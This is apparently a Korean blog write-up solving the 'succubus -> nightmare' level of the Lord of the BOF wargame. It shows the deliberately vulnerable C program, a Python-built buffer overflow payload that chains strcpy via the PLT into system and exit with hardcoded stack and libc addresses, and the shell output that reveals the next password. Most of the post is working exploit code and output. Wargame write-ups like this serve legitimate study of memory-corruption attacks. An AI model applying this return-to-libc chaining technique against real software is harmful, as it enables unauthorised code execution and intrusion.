[lob] succubus -> nightmare

[succubus@localhost succubus]$ cat nightmare.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
    char buffer[40];
    char *addr;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // check address
    addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // dangerous waterfall
    memset(buffer+40+8, 'A', 4);
}

dummy 44 + strcpy + ret[aaaa] + [buffer + 48] + [source] + [system] + [exit] + [buffer+72] + "my-pass\x0"
./aaaaaaaaa `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xa0\xfa\xff\xbf" + "\xac\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xb8\xfa\xff\xbf" + "my-pass\x0"'`

[succubus@localhost succubus]$ ./nightmare `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xb0\xfa\xff\xbf" + "\xbc\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xc8\xfa\xff\xbf" + "my-pass\x0"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb°ｺÿ¿ɀσ@ɺÿ¿my-pass
euid = 518
beg for me

저작자표시비영리동일조건

'공부 > LOB' 카테고리의 다른 글

[lob] nightmare -> xavius  (0)	2015.08.21
[lob] succubus -> nightmare  (0)	2015.02.19
[lob] zombie_assassin -> succubus  (0)	2015.02.17
[lob] assassin -> zombie_assassin  (0)	2014.07.30
[lob] giant -> assassin  (0)	2014.07.30
[lob] bugbear -> giant  (0)	2014.07.30